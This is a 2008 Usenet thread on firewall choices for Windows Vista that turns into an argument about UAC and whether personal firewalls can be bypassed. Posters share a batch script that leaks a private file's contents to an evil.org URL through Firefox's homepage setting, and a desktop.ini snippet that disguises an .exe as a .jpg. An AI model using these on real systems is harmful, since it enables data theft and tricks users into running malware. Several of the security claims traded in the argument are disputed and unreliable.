Microsoft Firewall vs ????


quodnomentibi@remailed.ws
03-25-08, 01:35 AM
I just got a new laptop a few days ago, running Vista Home Premium. I am
in the midst of "customizing" it. Presently, I am running the Microsoft
Firewall. Is this an act of blind faith on my part? In the last few
months of life of my last laptop, I ran Comodo Pro and was satisfied.

I'd prefer to run a free firewall, if that is prudent.

Any suggestions?

Thanks for your time and attention.

Q.N. Tibi


Sebastian G.
03-25-08, 02:06 AM
quodnomentibi@remailed.ws wrote:


> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part?


Yes. Windows Vista is trivially insecure.

> In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.


The only question is if this wasn't even worse.


> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?


Wipfw. But first you need to get rid of Vista.

Kayman
03-25-08, 05:29 AM
On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part? In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
The best defenses are:
1. Do not work in elevated level; Day-to-day work should be
performed while the User Account Control (UAC) is enabled. Turning
off UAC reduces the security of your computer and may expose you to
increased risk from malicious software.
2. Familiarize yourself with "Services Hardening in Windows Vista".
3. Keep your operating system (OS) (and all software on it)
updated/patched.
4. Reconsider the usage of IE.
5. Review your installed 3rd party software applications/utilities;
Remove clutter.
6. Don't expose services to public networks.
7. Activate the built-in firewall and tack together its advanced
configuration settings.
7a. If on high-speed internet use a router as well.
8. Routinely practice safe-hex.
9. Regularly back-up data/files.
10. Familiarize yourself with crash recovery tools and with
re-installing your operating system (OS).
11. Utilize a real-time anti-virus application and vital system
monitoring utilities/applications.
12. Keep abreast of the latest developments - ***** happens...you know.

The least preferred defenses are:
Myriads of popular anti-whatever applications and staying ignorant.

Peez of pith, really :-)

Sebastian G.
03-25-08, 06:55 AM
Kayman wrote:


> The best defenses are:
> 1. Do not work in elevated level;


Doesn't matter; in Windows Vista it's trivial to elevate with any consent.

> Day-to-day work should be
> performed while the User Account Control (UAC) is enabled.


UAC is trivial to spoof, and since it doesn't apply to all administrative
actions it's trivially insecure. Even further, since there's no need to
approve administrative actions if an elevated program is running in the
desktop context of an unprivileged user, it's even more insecure.


> 4. Reconsider the usage of IE.


There is nothing to reconsider. IE is a perfectly fine ActiveX Rich Platform
Client, a wonderful platform to implement complex software clients in a
trusted environment.
The only problem is that some people seem to understand it as a web browser,
and consequently abuse it as such. Obviously a stupid idea.

> 7a.If on high-speed internet use a router as well.


Huh? Why?

> 9. Regularly back-up data/files.


And why isn't this #1?

> 11.Utilize a real-time anti-virus application


Wonderful idea. Introduce a horribly buggy and pretty useless piece of
software....

Victek
03-25-08, 12:22 PM
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part? In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
> Thanks for your time and attention.
>
> Q.N. Tibi

I'm running Comodo firewall pro v3 on Vista and it's been fine. I also like
Online Armor and there will be a Vista compatible version in the near
future.

Sebastian G.
03-25-08, 04:05 PM
Victek wrote:


> I'm running Comodo firewall pro v3 on Vista and it's been fine.


Which only shows that you never bothered auditing it.

> I also like Online Armor

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a
Windows Live Mail user... but please, if you have no clue, then please don't
make suggestions to others.

s|b
03-25-08, 04:25 PM
On Tue, 25 Mar 2008 21:05:56 +0100, Sebastian G. wrote:

> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please don't
> make suggestions to others.

It's a good thing you are here to show us The Way, oh Wise One... |-)

--
s|b

Kayman
03-25-08, 06:55 PM
On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it.

<snip>

Q.N. Tibi

Here are some detailed references in relation to my earlier post. You may
wish to consider these when "customizing" your OS.

re: #1
Windows User Account Control Step-by-Step Guide
http://technet2.microsoft.com/WindowsVista/en/library/0d75f774-8514-4c9e-ac08-4c21f5c6c2d91033.mspx?mfr=true

re: #2
Services Hardening in Windows Vista
http://www.microsoft.com/technet/technetmag/issues/2007/01/SecurityWatch/
10 Immutable Laws of Security
http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true

re: #3
Keep your operating system (OS) and all software on it updated/patched.
"So, you didn’t patch the system and it got hacked. What to do? Well, let’s
see: ..."
"The only way to clean a compromised system is to flatten and rebuild.
That’s right. If you have a system that has been completely compromised,
the only thing you can do is to flatten the system (reformat the system
disk) and rebuild it from scratch (re-install Windows and your
applications)..."
http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx

Windows update.
http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us
Secunia Personal Software Inspector
http://secunia.com/software_inspector
https://psi.secunia.com/ and
M/S Security Baseline Analyzer 2.0
http://www.microsoft.com/downloads/details.aspx?FamilyId=4B4ABA06-B5F9-4DAD-BE9D-7B51EC2E5AC9&displaylang=en
can assist also.

re: #4
Utilizing another browser application can add to the overall security of
the OS. But,
Microsoft says Internet Explorer more secure than Firefox :-)
http://www.heise-security.co.uk/news/99955

IE7 safe/secure settings
Internet Explorer7 Desktop Security Guide
http://www.microsoft.com/downloads/details.aspx?FamilyId=6AA4C1DA-6021-468E-A8CF-AF4AFE4C84B2&displaylang=en

The Internet Explorer 7 Security Status Bar
http://www.microsoft.com/windows/products/winfamily/ie/ev/security.mspx

Extended Validation SSL Certificates
http://www.microsoft.com/windows/products/winfamily/ie/ev/default.mspx

Note: *Tight security settings will break down some websites. You need to
add these websites into the Trusted Zone for smooth access.*

You could consider disabling all Security Settings in IE and use IE only
for the 'Patch Tuesday' updates; To do so you must add the following URLs
to the Trusted sites:
http://update.microsoft.com
http://download.windowsupdate.com
https://*.update.microsoft.com
http://*.update.microsoft.com
http://*.microsoft.com

Alternative Browsers:
Opera™
http://www.opera.com/download/

Firefox™
http://www.mozilla.com/en-US/

The SeaMonkey® Suite (Internet Browser)
http://www.seamonkey-project.org/

re: #5
Review your installed 3rd party software applications;
Remove clutter, dispose of all your 'Anti-Whatever' applications. Keep your
PC lean, install only applications you really need - try to be a
'minimalist'.
Belarc Advisor can assist
http://www.belarc.com/free_download.html
as can
Absolute Uninstaller
http://www.glarysoft.com/au.html
Revo Uninstaller
http://www.revouninstaller.com/ and/or
Brute Force Uninstaller
http://www.majorgeeks.com/Brute_Force_Uninstaller_BFU_d4714.html

re: #6
Windows Vista Service Configurations Introduction
http://www.blackviper.com/WinVista/servicecfg.htm

re: #7
Tap into the Vista firewall's advanced configuration features
http://articles.techrepublic.com.com/5100-10877-6098592.html
"...once you discover the secret of accessing its advanced configuration
settings via the MMC snap-in, you'll find it to be far more configurable
and functional. At last, Windows comes with a sophisticated personal
firewall that can be used to set up outbound rules as well as inbound, with
the ability to customize rules to fit your precise needs."
Or
Configure Vista Firewall to support outbound packet filtering
http://searchwindowssecurity.techtarget.com/tip/0,289483,sid45_gci1247138,00.html
Or
Vista Firewall Control (Free versions available)
http://sphinx-soft.com/Vista/

re: #8
Routinely practice Safe-Hex.
http://www.claymania.com/safe-hex.html
Hundreds Click on 'Click Here to Get Infected' Ad
http://www.eweek.com/article2/0,1895,2132447,00.asp

re: #9
Back Up regularly; Develop a Contingency Plan; Be prepared!
Consider "What if..."

Use Windows to back up your computer.
http://www.microsoft.com/protect/yourself/data/backup.mspx

Powerful backup that is easy to do!
http://www.acronis.com.sg/homecomputing/

Casper™ Backup Solution for Windows
http://www.fssdev.com/

Norton Ghost™
http://www.symantec.com/norton/products/overview.jsp?pcid=br&pvid=ghost12

Free Back-Up Programs; There are many more - mileages will vary - get
appropriate advice before deciding on application.
http://www.karenware.com/powertools/ptreplicator.asp
http://www.2brightsparks.com/downloads.html#freeware
http://www.sover.net/~wysiwygx/WinUtils5.html
http://xxclone.com/
http://www.educ.umu.se/~cobian/cobianbackup.htm

'Must-have' utilities:
ERUNT and NTREGOPT
http://www.larshederer.homepage.t-online.de/erunt/

re: #10
Familiarize yourself with Crash recovery applications;
***** happens, you know! (Don't get caught flatfooted!)

Beginners Guides: Crash Recovery - Dealing with the Blue Screen Of Death
http://www.pcstats.com/articleview.cfm?articleID=1647

Bart's Preinstalled Environment (BartPE) bootable live windows CD/DVD
http://www.nu2.nu/pebuilder/

Windows PE 2.0 for Windows Vista Overview
http://technet.microsoft.com/en-us/windowsvista/aa905120.aspx

10a.
Re-install OS (reformat HDD). *See Footnote.
Back up all your important data files, documents, photos, music, etc. to CD
or DVD media.
Download all the necessary drivers for Vista (motherboard, Video Card,
Audio, Network card, Etc.)
Verify that you have the Application DVD and key code.
Belarc Advisor can assist:
http://www.belarc.com/free_download.html

How to install Windows Vista
http://support.microsoft.com/kb/918884
Scroll down to:
How to perform a clean installation of Windows Vista by starting the
computer from the Windows Vista DVD

re: #11
Utilize some system monitoring utilities/applications.
Process Explorer
http://technet.microsoft.com/en-au/sysinternals/bb896653.aspx
AutoRuns for Windows
http://technet.microsoft.com/en-au/sysinternals/bb963902.aspx
What's Running
http://www.whatsrunning.net/whatsrunning/main.aspx
RunScanner
http://www.runscanner.net/
TCPView for Windows
http://technet.microsoft.com/en-au/sysinternals/bb897437.aspx
CurrPorts - View Opened TCP/IP ports/connections
http://www.nirsoft.net/utils/cports.html
WALLWATCHER - Collect, View, and Analyze Router Logs
http://sonic.net/wallwatcher/

Beginners may wish to employ a real-time AV application.
Real-time AV applications - for viral malware.
Do not utilize more than one (1) real-time anti-virus scanning engine!
Disable the e-mail scanning function during installation (Custom
Installation on some AV apps.) as it provides no additional
protection. http://www.oehelp.com/OETips.aspx#3
In fact, most experts (incl. Norton) believe that scanning incoming and
outgoing mail causes e-mail file corruption.

Free antivirus - avast! 4 Home Edition
http://www.avast.com/eng/avast_4_home.html
(Choose Custom Installation and under Resident
Protection, uncheck: Internet Mail and Outlook/Exchange.)

Avira AntiVir® PersonalEdition Classic - Free
http://www.free-av.com/antivirus/allinonen.html

AVG Anti-Virus Free Edition
http://free.grisoft.com/

Activate the built-in Windows Defender application
Interesting reading:
http://www.pcworld.com/article/id,136195/article.html
"...Windows Defender did excel in behavior-based protection, which detects
changes to key areas of the system without having to know anything about
the actual threat."

And for the really paranoid consider utilizing:
SUPERAntiSpyware Free (in conjunction with WinDef)
http://www.superantispyware.com/superantispywarefreevspro.html

re: #12
Windows Vista Security Guide
http://www.microsoft.com/Downloads/details.aspx?FamilyID=a3d1bbed-7f35-4e72-bfb5-b84a526c1565&displaylang=en

*Footnote:
Reformatting of HDD is the preferred course of action! But if this is
beyond your capabilities then consult professional computer services (but
not the supermarket-type repair shops). If this is not an option then you
may be able to clean your OS by employing David H. Lipman's MULTI_AV.EXE
which can be downloaded from the URL:

English:
http://www.raymond.cc/blog/archives/2008/01/09/scan-your-computer-with-multiple-anti-virus-for-free/

Swiss/German:
http://www.pctipp.ch/downloads/dl/35905.asp

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE to
go through your FireWall to allow it to download the needed AV vendor
related files.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in
Normal Mode. This way all the components can be downloaded from each AV
vendor's web site.

The choices are; Sophos, Trend, McAfee, Kaspersky, Exit this menu and
Reboot the PC.

You can choose to go to each menu item and just download the needed files
or you can download the files and perform a scan in Normal Mode. Once you
have downloaded the files needed for each scanner you want to use, you
should reboot the PC into Safe Mode [F8 key during boot] and re-run the
menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal
Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more
comprehensive PDF help file.

Additional Instructions:
http://pcdid.com/Multi_AV.htm

(Note: An experienced and prepared operator probably will reformat a HDD
faster than utilizing the MULTI_AV scanning tool).

Good luck :)

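A worked version of item #7 above (the Vista firewall's outbound filtering that the TechRepublic and TechTarget references describe), added here as an editor's example and not anything posted in the thread: a batch script that puts all profiles on default-deny in both directions, turns on drop logging so missing rules show up, and adds explicit outbound allow rules. The service short names and the svchost.exe path are standard; the Firefox path is an assumption.

```batch
@echo off
rem Added example, not from the thread. Run from an elevated command prompt.
rem Vista's own enabled rules (e.g. the "Core Networking" group) stay in effect.

rem 1. Firewall on for every profile, default-deny inbound AND outbound.
netsh advfirewall set allprofiles state on
netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound

rem 2. Log dropped packets: the log tells you which rule is still missing
rem    before you reach for "allow all".
netsh advfirewall set allprofiles logging droppedconnections enable
netsh advfirewall set allprofiles logging filename "%SystemRoot%\system32\LogFiles\Firewall\pfirewall.log"

rem 3. Name resolution and DHCP, scoped to the services that need them
rem    (both run inside svchost.exe), not to every process on the box.
netsh advfirewall firewall add rule name="Out: DNS client" dir=out action=allow protocol=UDP remoteport=53 program="%SystemRoot%\system32\svchost.exe" service=Dnscache
netsh advfirewall firewall add rule name="Out: DHCP client" dir=out action=allow protocol=UDP localport=68 remoteport=67 program="%SystemRoot%\system32\svchost.exe" service=Dhcp

rem 4. Windows Update: wuauserv and BITS, HTTP/HTTPS only.
netsh advfirewall firewall add rule name="Out: Windows Update" dir=out action=allow protocol=TCP remoteport=80,443 program="%SystemRoot%\system32\svchost.exe" service=wuauserv
netsh advfirewall firewall add rule name="Out: BITS" dir=out action=allow protocol=TCP remoteport=80,443 program="%SystemRoot%\system32\svchost.exe" service=BITS

rem 5. The browser (install path assumed), HTTP/HTTPS only. Any other
rem    program that tries to phone home is dropped and logged instead.
netsh advfirewall firewall add rule name="Out: Firefox" dir=out action=allow protocol=TCP remoteport=80,443 program="%ProgramFiles%\Mozilla Firefox\firefox.exe"

rem 6. Review the result.
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all dir=out
```

To undo, `netsh advfirewall reset` restores the out-of-box policy; the same rules can be inspected and edited in the "Windows Firewall with Advanced Security" MMC snap-in mentioned above.
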
goarilla
03-26-08, 02:44 PM
Sebastian G. wrote:
> quodnomentibi@remailed.ws wrote:
>
>
>> I just got a new laptop a few days ago, running Vista Home Premium. I am
>> in the midst of "customizing" it. Presently, I am running the Microsoft
>> Firewall. Is this an act of blind faith on my part?
>
>
> Yes. Windows Vista is trivially insecure.
>
Do you have some evidence stating that fact?
Are you talking about Microsoft OSes in general?
Since I really need some evidence to put on the table
so my boss stops looking into Vista as a worthy domain OS.
>> In the last few
>> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
>
> The only question is if this wasn't even worse.
>
>
>> I'd prefer to run a free firewall, if that is prudent.
>>
>> Any suggestions?
>
>
> Wipfw. But first you need to get rid of Vista.

Sebastian G.
03-26-08, 02:49 PM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:


>> Yes. Windows Vista is trivially insecure.
>>
> do you have some evidence stating that fact?


- you can spoof filename via desktop.ini, which itself can be triggered by
shell namespaces
- UAC doesn't apply to all administrative actions and is trivial to spoof;
if you run as admin, it is trivial to circumvent; it provides no isolation;
if a file includes a prudent application manifest or triggers the setup
program detection, it won't even let you run a program without elevation
- PatchGuard makes it trivial to corrupt kernel memory just by debugging an
application in usermode
- not even talking about what system access you get granted for simply
presenting a DRMed media file...

> Are you talking about Microsoft OSes in general?


No. NT 5.1 and 5.2 look pretty secure.

> Since I really need some evidence to put on the table
> so my boss stops looking into Vista as a worthy domain OS.


Oh, that's simple: Install it on his computer so he can try it for a while.
Very likely that after two weeks he'll be fed up with it.

Q
03-26-08, 05:45 PM
Sebastian G. wrote:

> Wipfw. But first you need to get rid of Vista.

Please qualify your comment about issues with Vista security. As you
always do, you talk out of your arse.

Sebastian G.
03-26-08, 07:54 PM
Q wrote:

> Sebastian G. wrote:
>
>> Wipfw. But first you need to get rid of Vista.
>
> Please qualify your comment about issues with Vista security. As you
> always do, you talk out of your arse.


<news:64vk7lF25nl57U1@mid.dfncis.de>

Q
03-26-08, 08:16 PM
Sebastian G. wrote:

> <news:64vk7lF25nl57U1@mid.dfncis.de>

Is that your email address and news should be mail?

Why can't you post proof of concept links here? Sorry for the talking
out of your arse comment. It was uncalled for. Would just like to see
some proof of what you say though.

Sebastian G.
03-26-08, 11:56 PM
Q wrote:

> Sebastian G. wrote:
>
>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>
> Is that your email address and news should be mail?


No, it's a reference to one of my postings in this thread. Is your
newsreader that defective?

> Why can't you post proof of concept links here?


Actually you can easily derive a PoC just from the description. For example
the filename localization issue is well known, and you can take already
existing desktop.ini files utilizing this feature directly from the Vista
installation. Or, for example, a privilege that doesn't require UAC consent
is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all ACLs and
grants access to the raw disk.
On the other hand, you'll find in-detail information about the
implementation of PatchGuard at <http://uninformed.org/>. With a bit of
detailed understanding, you'll see that debugging heavily interacts with
PatchGuard in almost unforeseen ways (since it is, by itself, nothing but a
dirty kernel hack).

Rat River Cemetary
03-27-08, 12:14 AM
Sebastian G. wrote:
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?

There is no proof in any of your postings to this thread.

Rat River Cemetary
03-27-08, 12:42 AM
Sebastian G. wrote:

> Actually you can easily derive a PoC just from the description. For
> example the filename localization issue is well known, and you can take
> already existing desktop.ini files utilizing this feature directly from
> the Vista installation. Or, for example, a privilege that doesn't require
> UAC consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
> ACLs and grants access to the raw disk.
> On the other hand, you'll find in-detail information about the
> implementation of PatchGuard at <http://uninformed.org/>. With a bit of
> detailed understanding, you'll see that debugging heavily interacts with
> PatchGuard in almost unforeseen ways (since it is, by itself, nothing but
> a dirty kernel hack).

Every OS has exploits and is continually being patched. Linux has plenty
of its own, you just don't hear about them as much or they get patched
quietly in the background. So your whole point is what exactly?

Sebastian G.
03-27-08, 01:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Actually you can easily derive a PoC just from the description. For
>> example the filename localization issue is well known, and you can take
>> already existing desktop.ini files utilizing this feature directly from
>> the Vista installation. Or, for example, a privilege that doesn't require
>> UAC consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
>> ACLs and grants access to the raw disk.
>> On the other hand, you'll find in-detail information about the
>> implementation of PatchGuard at <http://uninformed.org/>. With a bit of
>> detailed understanding, you'll see that debugging heavily interacts with
>> PatchGuard in almost unforeseen ways (since it is, by itself, nothing but
>> a dirty kernel hack).
>
> Every OS has exploits and is continually being patched. Linux has plenty
> of its own, you just don't hear about them as much or they get patched
> quietly in the background. So your whole point is what exactly?


Seems like you don't even understand the difference between random and
systematic errors...

Sebastian G.
03-27-08, 01:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>
> There is no proof in any of your postings to this thread.


I never presented it as a proof, nor has one been asked for.

Rat River Cemetary
03-27-08, 12:26 PM
Sebastian G. wrote:

>
> I never presented it as a proof, nor has one been asked for.

I have and still see no positive proof from you.

Rat River Cemetary
03-27-08, 12:27 PM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Seems like you are nothing but a wind bag full of hot air. All talk and
no action.

Rat River Cemetary
03-27-08, 01:02 PM
Sebastian G. wrote:

> Which supports my claim, since this one is even worse.
>
> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please
> don't make suggestions to others.

I saw you once post proof of concept code to prove that any software
firewall can be bypassed. Would you please post that again as I want to
read it again, thanks.

Rat River Cemetary
03-28-08, 03:05 AM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Still waiting for your proof. BTW, so are some other people over at a
reputable web forum. They claim you are a Usenet loon and have no actual
proof. Put up or shut up.

Volker Birk
03-28-08, 08:08 AM
Rat River Cemetary <dead@rat.here> wrote:
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.

Hi,

for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).

After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
breakout-wp.cpp - and they lost again.

This topic is somewhat boring now.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Sebastian G.
03-28-08, 08:58 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Which supports my claim, since this one is even worse.
>>
>> OK, one shouldn't expect much if any understanding of security from a
>> Windows Live Mail user... but please, if you have no clue, then please
>> don't make suggestions to others.
>
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.


You mean something like this one?

setlocal enabledelayedexpansion
set x=
for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
for /r %%i in (prefs.js) do echo user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!");>>"%%i"

And then just wait until the user starts Firefox...

Sebastian G.
03-28-08, 08:59 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Seems like you don't even understand the difference between random and
>> systematic errors...
>
> Still waiting for your proof.


Are you really too stupid to simply write a desktop.ini with the content:

[LocalizedFilenames]
foo.exe=bar.jpg

and place it onto your desktop?

Victek
03-28-08, 12:09 PM
>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

Volker Birk
03-28-08, 12:21 PM
Victek <victek@invalid.invalid> wrote:
>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Because I needed 15 minutes to break the first time, and a meal with
friends on a Saturday evening to **** up the second time.

And: we had a closer look at common "Personal Firewall"
implementations, and all I saw was a terrible, incompetent mess.

Yours,
VB.

Sebastian G.
03-28-08, 01:28 PM
Victek wrote:

>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> Hi,
>>
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>>
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>>
>> This topic is somewhat boring now.
>>
>> Yours,
>> VB.
>
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Security requires reliability. The above shows a reliability of zero.

Rat River Cemetary
03-28-08, 04:50 PM
Sebastian G. wrote:

>
> Are you really too stupid to simply write a desktop.ini with the content:
>
> [LocalizedFilenames]
> foo.exe=bar.jpg
>
> and place it onto your desktop?

I'm talking about all of your claims and not just that one. Calling me
stupid does nothing for your credibility at all so either stop with the
hostile attitude and provide your own proof of concept or admit you are
a liar and nothing but a Usenet loon.

Sebastian G.
03-28-08, 05:00 PM
Rat River Cemetary wrote:


> I'm talking about all of your claims and not just that one. Calling me
> stupid does nothing for your credibility at all so either stop with the
> hostile attitude and provide your own proof of concept or admit you are
> a liar and nothing but a Usenet loon.


Or not willing to waste my time on trivial things that I consider easy
enough for you to figure out on your own. As if I would care what you're
thinking of me...

Rat River Cemetary
03-28-08, 10:19 PM
Sebastian G. wrote:

> Or not willing to waste my time on trivial things that I consider
> easy enough for you to figure out on your own. As if I would care
> what you're thinking of me...

Here's what my man on the inside has to say to you. Loon!

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch file just seems to copy prefs.js around the
system; it doesn't attain Admin from a limited user nor does it execute
code on remote systems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows; Windows is designed
to allow that. That is not a demonstration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
process, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send messages to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 10:19 PM
Volker Birk wrote:

> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

Man on the inside says this.

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch file just seems to copy prefs.js around the
system; it doesn't attain Admin from a limited user nor does it execute
code on remote systems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows; Windows is designed
to allow that. That is not a demonstration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
process, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send messages to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 10:24 PM
Sebastian G. wrote:

> Yes. Windows Vista is trivially insecure.

Care to comment on the below?

http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up

Volker Birk
03-28-08, 10:50 PM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> Man on the inside says this.
> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.

What "batch files"? Is this text about something else?

> What you asked about is Vista, and these are not Vista exploits."

I did not talk about Vista, but about "Personal Firewalls".

And I'm not talking about remote exploits or exploits at all.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Rat River Cemetary
03-28-08, 11:29 PM
Volker Birk wrote:

> What "batch files"? Is this text about something else?

Sebastian posted a batch file that I included in with your code. He is
referring to that.


> I did not talk about Vista, but about "Personal Firewalls".
>
> And I'm not talking about remote exploits or exploits at all.
>
> Yours,
> VB.

You're right.

Sebastian G.
03-29-08, 02:26 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Yes. Windows Vista is trivially insecure.
>
> Care to comment on the below?
>
> http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up


Obviously the guy wanted the MacBook Air (I'd want it too), and the guys who
wanted the Wintel notebook didn't manage to prepare the pre-made IE exploits
fast enough.

Sebastian G.
03-29-08, 02:31 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Or not willing to waste my time on trivial things that I consider being
>> easy enough for you to figure it out on your own. As if I would care
>> what you're thinking of me...
>
> Here's what my man on the inside has to say to you. Loon!


See below for the obvious reasons why I don't care for the opinions of idiots...

> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.


I never claimed a remote exploit.

> The batch files just seem to copy prefs.js around the
> system,


Bullshit. It reads the content of a file, puts it into a URL and writes to
prefs.js to set it as the default homepage. The next time the user starts up
Firefox, the homepage is surfed to, and the data are transmitted this way.

> it doesn't attain Admin from a limited user nor does it execute
> code on remote systems, so it's not an exploit. Ditto for the .c
> programs, they just send messages to other windows, windows is designed
> to allow that. That is not demonstration of a remote exploit or local
> privilege escalation exploit.


But it is an exploit against the application security feature of personal
firewalls.

> Also, in Vista you can't send a high integrity process (admin services
> and programs with admin privileges) a message from a lower integrity
> process, like say medium integrity (non-UAC prompting programs)
> processes or low integrity processes (sandboxed programs like IE7).


Wrong as well. Clipboard commands, NetDDE and COM+ Remoting are allowed,
also Named Pipes, Mailslots, Shared Sections, BaseNameObjects, JobObjects
etc. are shared.

> What you asked about is Vista, and these are not Vista exploits."


Never claimed those to be Vista exploits, even though they work quite well
under Vista.

Rat River Cemetary
03-31-08, 11:56 AM
Sebastian G. wrote:

